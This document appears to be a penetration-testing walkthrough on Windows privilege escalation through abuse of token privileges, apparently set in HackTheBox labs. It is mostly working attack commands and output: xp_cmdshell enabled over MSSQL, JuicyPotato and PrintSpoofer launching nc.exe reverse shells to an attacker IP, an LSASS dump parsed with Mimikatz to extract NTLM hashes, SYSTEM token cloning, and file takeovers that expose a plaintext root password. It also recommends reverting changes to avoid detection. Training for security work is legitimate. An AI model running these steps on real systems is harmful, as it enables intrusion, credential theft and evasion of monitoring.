User Privileges
Current User Privileges
C:\mrci0x1> whoami /privPrivilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledDangerous User privileges
User privileges, assigned via local or domain Group Policy, allow specific actions on a system.
Display Name
Assigned To (Default Users)
Privilege Description
Escalation Potential
SeNetworkLogonRight
Access this computer from the network
Administrators, Authenticated Users
Allows network connections via protocols like SMB or COM+.
Enables network-based attacks if misconfigured.
SeRemoteInteractiveLogonRight
Allow log on through Remote Desktop Services
Administrators, Remote Desktop Users
Permits RDP login to a server’s login screen.
Facilitates lateral movement or access to systems with elevated rights.
SeBackupPrivilege
Back up files and directories
Administrators
Bypasses permissions for system backups, including registry and files.
Allows extraction of sensitive data (e.g., SAM/NTDS) for credential theft.
SeSecurityPrivilege
Manage auditing and security log
Administrators
Permits configuring audit policies and managing security logs.
Enables manipulation of audit trails to evade detection.
SeTakeOwnershipPrivilege
Take ownership of files or other objects
Administrators
Allows taking ownership of securable objects like files, registry keys, or processes.
Grants control over restricted resources, enabling modification or access.
SeDebugPrivilege
Debug programs
Administrators
Permits attaching to or opening any process, including system-critical ones.
Provides access to sensitive processes for code injection or memory dumping.
SeImpersonatePrivilege
Impersonate a client after authentication
Administrators, Service Accounts
Allows impersonating users, often exploitable with tools like Juicy Potato.
Enables SYSTEM escalation via token abuse.
SeLoadDriverPrivilege
Load and unload device drivers
Administrators
Permits loading/unloading drivers, which run as highly privileged code.
Facilitates malicious driver loading for kernel-level access.
SeRestorePrivilege
Restore files and directories
Administrators
Bypasses permissions during restore operations and allows setting object ownership.
Enables overwriting critical files or restoring malicious backups.
Enable privileges
CMD
PSBits/EnableAllParentPrivileges at master · gtworek/PSBitsGitHub
Powershell
PowerShell Gallery | Scripts/Enable-Privilege.ps1 0.3.0.0
PS C:\mrci0x1> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ======================================================= ========
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabledhttps://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1cCopy the code and then past oin target machine (windows)
PS C:\mrci0x1> Import-Module .\Enable-Privilege.ps1
PS C:\mrci0x1> .\EnableAllTokenPrivs.ps1
PS C:\mrci0x1> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ======================================== =======
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnableAttacks
SeImpersonate and SeAssignPrimaryToken
Understanding the Privileges
SeImpersonatePrivilege: allows impersonating a user’s token after authentication. Exploitable with JuicyPotato, PrintSpoofer, etc.SeAssignPrimaryTokenPrivilege: allows replacing a process’s primary token. Often used together withSeImpersonatePrivilege.
Note: Service accounts like MSSQL or IIS often hold these privileges.
Common Exploitation Scenarios
Web shell (e.g., ASPX)
Application exploits (e.g., Jenkins)
SQL Server via
xp_cmdshell
Why Check? Presence of these privileges means fast privilege escalation path.
Exploiting MSSQL Service Account
Step 1: Connect to MSSQL using Impacket
mrci0x1@htb$ mssqlclient.py sql_dev@10.129.43.30 -windows-authPassword:
[*] Encryption required, switching to TLS
[*] ACK: Microsoft SQL Server
SQL>Step 2: Enable xp_cmdshell
SQL> enable_xp_cmdshell[*] INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to installStep 3: Confirm User Context
SQL> xp_cmdshell whoamiSQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
nt service\mssql$sqlexpress01Step 4: Check Token Privileges
SQL> xp_cmdshell whoami /privoutput
--------------------------------------------------------------------------------
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled Step 5: Exploit with JuicyPotato (Windows Server 2016 and below)
Upload required tools
JuicyPotato.exe
nc.exe
Setup listener on attacker machine
mrci0x1@htb$ sudo nc -lnvp 8443listening on [any] 8443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.129.43.30] 50332
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>hostname
hostname
WINLPE-SRV01Execute exploit
SQL> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *[+] authresult 0
NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OKStep 6: Exploit with PrintSpoofer (Windows Server 2019 and later)
Upload required tools
PrintSpoofer.exe
nc.exe
Setup listener
mrci0x1@htb$ nc -lnvp 8443Execute exploit
SQL> xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OKAlternative Tools
RoguePotato: Supports modern WindowsCustom scripts using
CreateProcessWithTokenW
SeDebugPrivilege Abuse
SeDebugPrivilege allows debugging and manipulating any process, including SYSTEM-level ones like LSASS.
This privilege allows full control over any process on the machine. Typically assigned to administrators, developers, or service accounts.
Identifying SeDebugPrivilege
Check if you have this privilege assigned.
C:\mrci0x1> whoami /privPRIVILEGES INFORMATION
----------------------
Privilege Name Description State
SeDebugPrivilege Debug programs Disabled
SeChangeNotifyPrivilege Bypass traverse EnabledConfirming
SeDebugPrivilegemeans you can target LSASS and other processes even if you're not full administrator.
Exploit it
Method 1: Dump LSASS Memory for Credentials
Dumping LSASS with ProcDump
C:\mrci0x1> procdump.exe -accepteula -ma lsass.exe lsass.dmpProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[15:25:45] Dump 1 initiated: C:\Tools\Procdump\lsass.dmp
[15:25:45] Dump 1 writing: Estimated dump file size is 42 MB.
[15:25:45] Dump 1 complete: 43 MB written in 0.5 seconds
[15:25:46] Dump count reached.Transfer the dump to your attack machine
Then parse it locally using Mimikatz.
Extract Credentials with Mimikatz
C:\mrci0x1> mimikatz.exeInside Mimikatz:
mimikatz # log
Using 'mimikatz.log' for logfile : OK
mimikatz # sekurlsa::minidump C:\Tools\lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...Authentication Id : 0 ; 23026942 (00000000:015f5cfe)
Session : RemoteInteractive from 2
User Name : jordan
Domain : WINLPE-SRV01
Logon Server : WINLPE-SRV01
Logon Time : 3/31/2021 2:59:52 PM
SID : S-1-5-21-3769161915-3336846931-3985975925-1000
msv :
[00000003] Primary
* Username : jordan
* Domain : WINLPE-SRV01
* NTLM : cf3a5525ee9414229e66279623ed5c58
* SHA1 : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2
tspkg :
wdigest :
* Username : jordan
* Domain : WINLPE-SRV01
* Password : (null)
kerberos :
* Username : jordan
* Domain : WINLPE-SRV01
* Password : (null)
ssp :
credman :You now have NTLM hashes for Pass-the-Hash attacks.
Alternative: Manual Dump via Task Manager
If tools like ProcDump are blocked:
Open Task Manager > Details tab
Right-click
lsass.exe> Create dump fileTransfer the dump and analyze with Mimikatz
Method 2: Remote Code Execution as SYSTEM
You can directly impersonate SYSTEM by cloning SYSTEM process tokens.
a. Using psgetsystem (PowerShell PoC)
b. Transfer psgetsystem.ps1 to the target
Open elevated PowerShell
PS C:\mrci0x1> tasklistLook for a SYSTEM-owned process like winlogon.exe:
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 Services 0 4 K
System 4 Services 0 116 K
smss.exe 340 Services 0 1,212 K
csrss.exe 556 Console 1 5,972 K
winlogon.exe 612 Console 1 10,408 KRun PoC to spawn SYSTEM shell:
PS C:\mrci0x1> ./psgetsys.ps1 [MyProcess]::CreateProcessFromParent(612, "cmd.exe", "")You should get a new shell as SYSTEM:
C:\mrci0x1> whoami
nt authority\systemAutomating PID retrieval:
PS C:\mrci0x1> $pid = (Get-Process -Name lsass).Id
PS C:\mrci0x1> [MyProcess]::CreateProcessFromParent($pid, "cmd.exe", "")SeTakeOwnershipPrivilege Abuse
SeTakeOwnershipPrivilege allows a user to take ownership of securable objects such as files, folders, registry keys, or Active Directory objects.
Once ownership is obtained, you can modify permissions even if you previously had no access to the object.
Typically, only Administrators have this privilege, but sometimes it's assigned to service accounts (backup, shadow copy) or accidentally to standard users.
Identifying SeTakeOwnershipPrivilege
Check if your current user holds this privilege:
PS C:\mrci0x1> whoami /privPRIVILEGES INFORMATION
----------------------
Privilege Name Description State
SeTakeOwnershipPrivilege Take ownership of files or objects Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledEnabling SeTakeOwnershipPrivilege
If the privilege shows as disabled, you can enable it using PowerShell modules
such as Enable-Privilege.ps1 or EnableAllTokenPrivs.ps1 (assuming you can run them).
PS C:\mrci0x1> Import-Module .\Enable-Privilege.ps1
PS C:\mrci0x1> .\EnableAllTokenPrivs.ps1
PS C:\mrci0x1> whoami /privPrivilege Name Description State
SeTakeOwnershipPrivilege Take ownership of files or objects Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledNow the privilege is active in the current session.
Exploitation Scenario: Access Restricted File
Step 1: Identify Target File
Assume you discover a restricted file cred.txt in a share:
PS C:\mrci0x1> Get-ChildItem 'C:\Department Shares\Private\IT\cred.txt' | Select FullName,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}FullName LastWriteTime Attributes Owner
-------- ------------- ---------- -----
C:\Department Shares\Private\IT\cred.txt 6/18/2021 12:23:28 PM Archive WINLPE-SRV01\sccm_svcStep 2: Take Ownership
PS C:\mrci0x1> takeown /f "C:\Department Shares\Private\IT\cred.txt"SUCCESS: The file (or folder): "C:\Department Shares\Private\IT\cred.txt" now owned by user "WINLPE-SRV01\mrci0x1".Step 3: Confirm Ownership
PS C:\mrci0x1> Get-ChildItem 'C:\Department Shares\Private\IT\cred.txt' | select name,directory,@{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}Name Directory Owner
---- --------- -----
cred.txt C:\Department Shares\Private\IT WINLPE-SRV01\mrci0x1Ownership was successfully changed.
Step 4: Modify ACL to Grant Full Access
Ownership alone doesn't grant read permission. You need to modify the ACL:
PS C:\mrci0x1> icacls "C:\Department Shares\Private\IT\cred.txt" /grant mrci0x1:Fprocessed file: C:\Department Shares\Private\IT\cred.txt
Successfully processed 1 files; Failed processing 0 filesStep 5: Read the File
PS C:\mrci0x1> Get-Content "C:\Department Shares\Private\IT\cred.txt"NIX01 admin
root:n1X_p0wer_us3er!You obtained credentials that may lead to lateral movement or further escalation.
Step 6: Revert Changes (Optional but Recommended)
After reading, it's good practice to restore original ownership and permissions to avoid detection.
Files of Interest
Look for files containing sensitive data that may lead to escalation:
C:\inetpub\wwwroot\web.config— Web app credentials%WINDIR%\repair\sam,%WINDIR%\repair\system— Registry hives%WINDIR%\system32\config\*.sav— Backup hivesKeePass databases:
*.kdbxFiles like
passwords.*,creds.*,secrets.*Configuration files with hardcoded credentials
Alternative: Active Directory Object Ownership
In Active Directory, you can take ownership of:
GPOs
User objects
OUs
For example, you can use SharpGPOAbuse to assign GPO edit rights and push malicious startup scripts.
Last updated